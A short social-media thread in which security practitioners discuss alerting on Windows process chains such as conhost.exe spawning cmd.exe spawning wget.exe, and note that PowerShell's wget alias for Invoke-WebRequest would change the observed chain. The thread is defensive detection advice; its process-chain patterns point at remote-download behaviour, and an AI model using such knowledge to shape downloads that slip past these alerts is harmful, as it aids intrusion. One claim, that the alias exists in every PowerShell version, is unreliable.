Paul MelsonOct 3, 2025

If you’re not alreadyalerting on

CONHOST.EXE spawning CMD.EXE spawning WGET.EXE

or

CONHOST.EXE spawning CONHOST.EXE spawning CONHOST.EXE

you’re gonna want to close that gap today.

Show threadJernej Simončič �Oct 3, 2025

@pmelson …wget? Why not curl (which is built-in).

(and I should really update my wget binaries)

Show threadPaul MelsonOct 3, 2025
@jernej__s I’m just reporting on what I’m seeing.
Show threadJernej Simončič �Oct 3, 2025
@pmelson That looks like it's invoking PowerShell's wget built-in (which is an alias for Invoke-Webrequest), so you won't see wget.exe running anywhere.
Show threadIchinin   ✅🎯🙄Oct 3, 2025

@jernej__s @pmelson You will see powershell process downloading data from an external location.

More focus on behaviour - less focus on tooling.

Show threadJernej Simončič �Oct 3, 2025
@Ichinin @pmelson Yeah, but the original post was about alerting on conhost → cmd → wget, which won't work in this case (it'll be conhost → cmd → powershell).
Show threadPaul Melson
@jernej__s @Ichinin I was unaware that ‘wget’ is an alias for IWR. What version(s) of PowerShell does that work for?
Oct 3, 2025 at 11:27pmWeb
Show threadJernej Simončič �Oct 3, 2025
@pmelson @Ichinin Every as far as I know (and there have been complaints about this since the beginning, because neither wget, nor curl powershell built-ins work anything remotely like the real programs).